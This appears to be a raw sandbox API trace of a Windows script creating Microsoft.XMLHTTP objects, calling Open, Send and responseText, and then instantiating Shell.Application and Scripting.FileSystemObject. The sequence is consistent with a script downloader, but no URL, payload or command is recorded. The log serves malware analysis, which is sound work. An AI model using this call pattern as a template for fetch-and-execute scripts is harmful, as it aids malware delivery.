	[0472.209] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0472.209] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0472.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0472.209] ??2@YAPEAX_K@Z () returned 0x62f310
	[0472.209] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0472.209] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0472.209] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0472.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0472.209] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0472.209] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0472.209] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0472.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0472.210] longjmp () 
	[0472.210] longjmp () 
	[0472.210] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0472.210] SysStringLen (param_1=0x0) returned 0x0
	[0472.210] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0472.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0472.210] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0472.210] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0472.210] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0472.210] ??2@YAPEAX_K@Z () returned 0x62f330
	[0472.210] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0472.210] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0472.211] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0472.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0472.211] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0472.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0472.211] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0472.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0472.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0472.211] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0472.211] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0472.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0472.514] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0472.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0472.514] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0472.515] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0472.515] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0472.515] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0472.515] SysStringLen (param_1=0x0) returned 0x0
	[0472.515] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0472.515] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0472.515] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0472.515] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0472.515] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0472.515] ??2@YAPEAX_K@Z () returned 0x62f350
	[0472.515] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0472.515] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0472.515] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0472.515] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0472.516] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0472.516] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0472.516] SysStringLen (param_1=0x0) returned 0x0
	[0472.516] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0472.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0472.518] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0472.518] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0472.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0472.518] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0472.518] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0474.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0474.237] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0474.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0474.238] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0474.238] SysStringLen (param_1=0x0) returned 0x0
	[0474.238] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0474.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0474.239] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0474.239] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0474.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0474.239] ??2@YAPEAX_K@Z () returned 0x62f330
	[0474.239] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0474.239] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0474.239] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0474.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0474.239] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0474.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0474.239] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0474.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0474.242] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0474.242] SysStringLen (param_1=0x0) returned 0x0
	[0474.242] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0474.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0474.242] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0474.242] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0474.242] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0474.242] ??2@YAPEAX_K@Z () returned 0x62f310
	[0474.243] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0474.243] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0474.243] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0474.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0474.243] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0474.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0474.243] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0474.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0474.243] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0474.243] SysStringLen (param_1=0x0) returned 0x0
	[0474.243] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0474.243] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
